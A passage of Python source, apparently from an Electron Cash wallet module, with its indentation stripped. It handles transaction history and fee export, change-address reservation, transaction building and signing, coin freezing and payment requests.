with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _a, addr, _b in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append((tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Node the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactoins since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because because of the Python lists, dict, etc they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr == None: continue
input_addresses.append(addr.to_full_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_full_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
"""Return a status value and status string.
Meaning of the status flag:
- 0: unconfirmed parent
- 1: status no longer used (it used to mean low fee for BTC)
- 2: unconfirmed
- 3: not verified (included in latest block)
- 4: verified by 1 block
- 5: verified by 2 blocks
- 6: verified by 3 blocks
- 7: verified by 4 blocks
- 8: verified by 5 blocks
- 9: verified by 6 blocks or more
"""
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
status = 3
status_str = 'unknown'
elif height < 0:
status = 0
status_str = 'Unconfirmed parent'
elif height == 0:
status = 2
status_str = 'Unconfirmed'
else:
status = 3
status_str = 'Not Verified'
else:
status = 3 + min(conf, 6)
status_str = format_time(timestamp) if timestamp else _("unknown")
return status, status_str
def reserve_change_addresses(self, count, temporary=False):
""" Reserve and return `count` change addresses. In order
of preference, this will return from:
1. addresses 'freed' by `.unreserve_change_address`,
2. addresses in the last 20 (gap limit) of the change list,
3. newly-created addresses.
Of these, only unlabeled, unreserved addresses with no usage history
will be returned. If you pass temporary=False (default), this will
persist upon wallet saving, otherwise with temporary=True the address
will be made available again once the wallet is re-opened.
On non-deterministic wallets, this returns an empty list.
"""
if count <= 0 or not hasattr(self, 'create_new_address'):
return []
with self.lock:
last_change_addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if not last_change_addrs:
# this happens in non-deterministic wallets but the above
# hasattr check should have caught those.
return []
def gen_change():
try:
while True:
yield self.change_unreserved.pop(0)
except IndexError:
pass
for addr in last_change_addrs:
yield addr
while True:
yield self.create_new_address(for_change=True)
result = []
for addr in gen_change():
if ( addr in self.change_reserved
or addr in self.change_reserved_tmp
or self.get_num_tx(addr) != 0
or addr in result):
continue
addr_str = addr.to_storage_string()
if self.labels.get(addr_str):
continue
result.append(addr)
if temporary:
self.change_reserved_tmp.add(addr)
else:
self.change_reserved.add(addr)
if len(result) >= count:
return result
raise RuntimeError("Unable to generate new addresses") # should not happen
def unreserve_change_address(self, addr):
""" Unreserve an addr that was set by reserve_change_addresses, and
also explicitly reschedule this address to be usable by a future
reservation. Unreserving is appropriate when the address was never
actually shared or used in a transaction, and reduces empty gaps in
the change list.
"""
assert addr in self.get_change_addresses()
with self.lock:
self.change_reserved.discard(addr)
self.change_reserved_tmp.discard(addr)
self.change_unreserved.append(addr)
def get_default_change_addresses(self, count):
""" Return `count` change addresses from the default reserved list,
ignoring and removing used addresses. Reserves more as needed.
The same default change addresses keep getting repeated until they are
actually seen as used in a transaction from the network. Theoretically
this could hurt privacy if the user has multiple unsigned transactions
open at the same time, but practically this avoids address gaps for
normal usage. If you need non-repeated addresses, see
`reserve_change_addresses`.
On non-deterministic wallets, this returns an empty list.
"""
result = []
with self.lock:
for addr in list(self.change_reserved_default):
if len(result) >= count:
break
if self.get_num_tx(addr) != 0:
self.change_reserved_default.remove(addr)
continue
result.append(addr)
need_more = count - len(result)
if need_more > 0:
new_addrs = self.reserve_change_addresses(need_more)
self.change_reserved_default.extend(new_addrs)
result.extend(new_addrs)
return result
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
elif callable(fixed_fee):
fee_estimator = fixed_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
change_addrs = []
if change_addr:
change_addrs = [change_addr]
if not change_addrs:
# hook gave us nothing, so find a change addr from the change
# reservation subsystem
max_change = self.max_change_outputs if self.multiple_change else 1
if self.use_change:
change_addrs = self.get_default_change_addresses(max_change)
else:
change_addrs = []
if not change_addrs:
# For some reason we couldn't get any autogenerated change
# address (non-deterministic wallet?). So, try to find an
# input address that belongs to us.
for inp in inputs:
backup_addr = inp['address']
if self.is_mine(backup_addr):
change_addrs = [backup_addr]
break
else:
# ok, none of the inputs are "mine" (why?!) -- fall back
# to picking first max_change change_addresses that have
# no history
change_addrs = []
for addr in self.get_change_addresses()[-self.gap_limit_for_change:]:
if self.get_num_tx(addr) == 0:
change_addrs.append(addr)
if len(change_addrs) >= max_change:
break
if not change_addrs:
# No unused wallet addresses or no change addresses.
# Fall back to picking ANY wallet address
try:
# Pick a random address
change_addrs = [random.choice(self.get_addresses())]
except IndexError:
change_addrs = [] # Address-free wallet?!
# This should never happen
if not change_addrs:
raise RuntimeError("Can't find a change address!")
assert all(isinstance(addr, Address) for addr in change_addrs)
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs,
fee_estimator, DUST_THRESHOLD, sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
tx_in_bytes=tx.estimated_size()
fee_in_satoshis=tx.get_fee()
sats_per_byte=fee_in_satoshis/tx_in_bytes
if (sats_per_byte > 100):
raise ExcessiveFee()
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
def is_frozen(self, addr):
""" Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. """
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo: Union[str, dict, Set[str]]) -> Union[bool, Set[str]]:
""" 'coin' level frozen query. Note: this is set/unset independent of
address-level freezing.
`utxo` is a prevout:n string, or a dict as returned from get_utxos(),
in which case a bool is returned.
`utxo` may also be a set of prevout:n strings in which case a set is
returned which is the intersection of the internal frozen coin sets
and the `utxo` set. """
assert isinstance(utxo, (str, dict, set))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
elif isinstance(utxo, set):
# set is returned
return (self.frozen_coins | self.frozen_coins_tmp) & utxo
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
"""Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable."""
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary=False):
"""Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
call to `set_frozen_coin_state(utxos, False), both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`."""
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add(utxo)
def discard(utxo):
self.frozen_coins.discard(utxo)
self.frozen_coins_tmp.discard(utxo)
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation(utxo)
ok += 1
elif isinstance(utxo, dict):
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation(txo)
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
self.cashacct.start(self.network) # start cashacct network-dependent subsystem, nework.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
# Note: syncrhonizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do thier clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the syncronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.save_change_reservations()
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. not need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == bitcoin.TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(bitcoin.TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache)
except UserCancelled:
continue
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_full_ui_string()
amount_text = format_satoshis(r['amount']) # fixme: this should not be localized
out['URI'] = '{}?amount={}'.format(addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if not 'index_url' in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(bitcoin.Hash(
addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
